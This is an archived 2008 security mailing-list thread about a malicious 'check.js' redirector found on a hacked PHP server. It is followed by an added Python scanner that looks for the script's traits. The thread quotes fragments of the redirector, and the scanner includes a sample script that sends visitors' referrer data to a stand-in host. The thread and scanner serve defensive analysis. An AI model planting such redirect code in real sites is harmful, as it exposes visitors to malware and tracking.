WebApp Sec mailing list archives
Re: PHP Security
From: "Greg Song" <bigrootno1 () gmail com>
Date: Wed, 19 Mar 2008 08:50:28 +0900
Hi,

There are some files that include 'check.js', the same as you. First of all, 'check.js' is a kind of redirector. For example, if someone visits a website that includes 'check.js', the request is redirected to some other URLs (usually getting malicious code), and I guess it gathers information (where the visit came from).

Parts of check.js:

...
google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|ramble...
location.href=JSS3+'?r='+encodeURIComponent(document.referrer)+'&s='+JSS2
...

Greg.

2008/3/18, Sindre Øvrebø <sindre () webhuset no>:
----- Original message -----
From: "Greg Song" <bigrootno1 () gmail com>
To: webappsec () securityfocus com
Date: Tue, 18 Mar 2008 08:58:49 +0900
Subject: PHP Security

Hi all

These days I'm analyzing a Solaris system that uses the Apache web server and PHP. Of course it was hacked. I could not find the reason for a situation in which a specific directory is created over and over (it includes check.js).

Web log record as below:

xxx.xxx.xxx.xxx GET "/XXX/ahibix/check.js

Some pages can upload files, but it didn't work when I uploaded a PHP file. I'm wondering how it makes the directories. Any suggestions, ideas?

Thanks all

Hi,

I am replying outside the list. I just discovered check.js, and some other files, on one of my servers yesterday. What does check.js do? I am not familiar with this/these scripts. Would be really cool if you replied :)

Sindre Øvrebø
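
The two traits quoted in the reply above (a search-engine name list and a `location.href` assignment built from `document.referrer`) can be turned into a file-system check for cleanup work. The following is an added example, not part of the original thread and not code from check.js; the function names, the three-name threshold, the sample scripts and the values given to `JSS2`/`JSS3` are assumptions made for illustration.

```python
import re
from pathlib import Path

# Engine names quoted in the check.js fragment from the post (truncated entry omitted).
ENGINES = {"google", "msn", "yahoo", "live", "ask", "dogpile", "mywebsearch", "yandex"}
# Words joined by '|', as in a regex alternation such as google|msn|yahoo
ALTERNATION = re.compile(r"[a-z0-9]+(?:\|[a-z0-9]+){2,}", re.I)
# Assignment to location / location.href whose value is built from document.referrer
REFERRER_REDIRECT = re.compile(r"location(?:\.href)?\s*=[^;\n]*document\.referrer", re.I)

def engine_names(js):
    """Return the largest set of known engine names found in one '|' alternation."""
    best = set()
    for m in ALTERNATION.finditer(js):
        names = {w.lower() for w in m.group(0).split("|")} & ENGINES
        if len(names) > len(best):
            best = names
    return best

def classify(js):
    """'redirector' needs both traits from the post; a single trait is only 'review'."""
    has_list = len(engine_names(js)) >= 3
    has_redirect = bool(REFERRER_REDIRECT.search(js))
    if has_list and has_redirect:
        return "redirector"
    return "review" if (has_list or has_redirect) else "clean"

def scan_tree(root):
    """Classify every .js file under root; return {relative path: verdict} if not clean."""
    findings = {}
    for path in sorted(Path(root).rglob("*.js")):
        verdict = classify(path.read_text(errors="replace"))
        if verdict != "clean":
            findings[str(path.relative_to(root))] = verdict
    return findings

# Constructed samples. JSS2/JSS3 come from the quoted fragment; their values and the
# surrounding if-statement are assumptions made for this example.
SAMPLE_REDIRECTOR = """var JSS2='1', JSS3='http://collector.invalid/in';
if (/google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex/.test(document.referrer)) {
  location.href=JSS3+'?r='+encodeURIComponent(document.referrer)+'&s='+JSS2;
}"""
SAMPLE_LOGIN = "location.href = '/login?next=' + encodeURIComponent(document.referrer);"
SAMPLE_FORM = "function check(f){ if(f.email.value==''){ return false; } return true; }"

if __name__ == "__main__":
    for name in ("SAMPLE_REDIRECTOR", "SAMPLE_LOGIN", "SAMPLE_FORM"):
        print(name, "->", classify(globals()[name]))
```

Pointing `scan_tree` at the web root lists every script that matches, including copies in directories that keep being recreated; a "review" verdict marks a file that shows only one of the two traits and needs a manual look.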